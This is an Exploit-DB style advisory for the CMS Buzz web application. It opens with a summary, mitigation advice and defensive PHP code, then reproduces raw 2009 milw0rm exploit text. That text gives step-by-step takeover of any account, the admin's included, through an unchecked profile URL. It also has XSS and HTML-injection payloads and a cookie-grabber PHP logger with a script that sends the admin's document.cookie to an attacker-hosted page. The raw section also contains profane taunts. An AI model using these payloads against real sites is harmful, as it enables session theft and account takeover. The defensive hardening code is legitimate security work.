Vendor: CMS Buzz
By: ThE g0bL!N
CVSS: 8.8 (HIGH)
Type: Cross-Site Scripting (XSS) & HTML Injection & Cookie Grabber Exploit
CWE: 79 (XSS) & 89 (HTML Injection) & 522 (Cookie Grabber Exploit)
Product Name: CMS Buzz
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

CMS Buzz (XSS/Change Password) Multiple Remote Vulnerabilities & Cookie Grabber Exploit & HTML Injection

CMS Buzz allows a registered user to change the password of any other user, including the admin, by opening that user's profile page. An attacker can also inject JavaScript through the search page, which executes in the browser of a user who visits the page. In addition, message content is rendered as HTML: the attacker hosts two files on a web server, cookie.php and log.txt, where cookie.php records the cookie value it receives and log.txt stores it. The attacker then sends the admin a message containing JavaScript that redirects the admin's browser to cookie.php with the admin's cookie attached, so the cookie is captured when the admin reads the message.

Mitigation:

To mitigate the XSS and HTML injection issues, the application should validate all user input and encode output. To mitigate the cookie grabber exploit, the application should use secure cookies and ensure that the cookie is only sent over HTTPS.
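
The mitigations above, together with an ownership check for the profile page, shown in PHP as an added example (not CMS Buzz code; PHP is assumed because the PoC below is PHP, and the function names and the `user` session key are hypothetical). The Secure flag only keeps the cookie off plain HTTP; HttpOnly is the attribute that stops script from reading it through document.cookie.

```php
<?php
// Added example, not CMS Buzz code. Function names and the 'user' session
// key are hypothetical; the array form of the cookie call needs PHP 7.3+.

// Session cookie: HttpOnly hides it from document.cookie, Secure keeps it
// off plain HTTP, SameSite=Lax limits cross-site sends. Call before output.
function start_hardened_session(): void {
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Output encoding for every user-supplied value (search term, message
// subject and body) at the point it is written into an HTML page.
function e(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Authorization for ?action=profile&user=<name>: only the logged-in owner
// of the account may view or change it.
function may_edit_profile(array $session, string $requestedUser): bool {
    return isset($session['user'])
        && is_string($session['user'])
        && hash_equals($session['user'], $requestedUser);
}

// Constructed sample input: the three message payloads quoted in the PoC.
$samples = [
    '<script>alert("xss")</script>',
    '"><iframe src=http://www.google.com/></iframe>',
    '">"">>>><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""',
];
foreach ($samples as $payload) {
    echo e($payload), PHP_EOL;   // encoded, so the browser shows it as text
}

// Constructed sessions: another account's profile, then the user's own.
var_dump(may_edit_profile(['user' => 'alice'], 'admin'));
var_dump(may_edit_profile(['user' => 'alice'], 'alice'));
```

htmlspecialchars covers HTML body text and quoted attribute values; values written into JavaScript, URLs or CSS need the encoder for that context.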

Exploit-DB raw data:

#################################################################################################################
[+] CMS Buzz (xss/Change Password)Multiple Remote Vulnerabilities
[+] Discovered By ThE g0bL!N
[+] Vendor:cmsbuzz.com
[+] Note : If you are The S3r!0uS  I say To Fuck you Because You are Hacked  Site Of My Best Friends dz-boys.com
[+] Demo:http://demo.cmsbuzz.com/
[+] Greeting : All my friends ( Dz )
#################################################################################################################
Remote Changing Password:
+++++++++++++++++++++++++
1) You Must Register In ThE site http://www.victim.com/?action=register
2) Login
3) Go To url:
    http://www.victim.com/?action=profile&user= [ Name Of user ]
Example
http://www.victim.com/?action=profile&user=admin
Change admin Password Then go To login http://path/?action=login
Cross Site Scripting
++++++++++++++++++++
http://www.victim.com/?action=search
<script>alert("xss")</script>

#################################################################################################################
[+] CMS Buzz Cookie Grabber Exploit& HTML Injection
[+] Discovered By ThE g0bL!N
[+] Vendor:http://msbuzz.com/
[+] Fuck You The S3r!0uS
#################################################################################################################
PoC
--
[+] Make 2 files and upload to your host :
[+]cookie.php  - > Put in this File That Code:
 <?php
 $cookie = $_GET['cookie'];
 $log = fopen("log.txt", "a");
 fwrite($log, $cookie ."\n");
 fclose($log);
 ?>
[+]log.txt   - > CHMOD it 777 and put in the same directory with cookie.php
 
[+]Exploit:
   -------
1) Register in the site
2) Go to send message http://path/?action=compose
3)We Put in
  To:admin name
  Subject: Some Subject
  Message: <script>document.location ="http://localhost/[path]/cookie.php?cookie=" + document.cookie;</script>
  The JS code runs when the admin reads the message
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2) HTML Injection
+++++++++++++++++
1) Register :p
2) Go to send message http://path/?action=compose
3)We Put in
  To:admin name
  Subject: Some Subject
  Message: 1) XSS PoC: <script>alert("xss")</script>
           2) PoC: Iframe: "><iframe src=http://www.google.com/></iframe>
           3) PoC: Redirection: ">"">>>><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""
     DEMO:http://demo.cmsbuzz.com
################################################################################################################

# milw0rm.com [2009-06-18]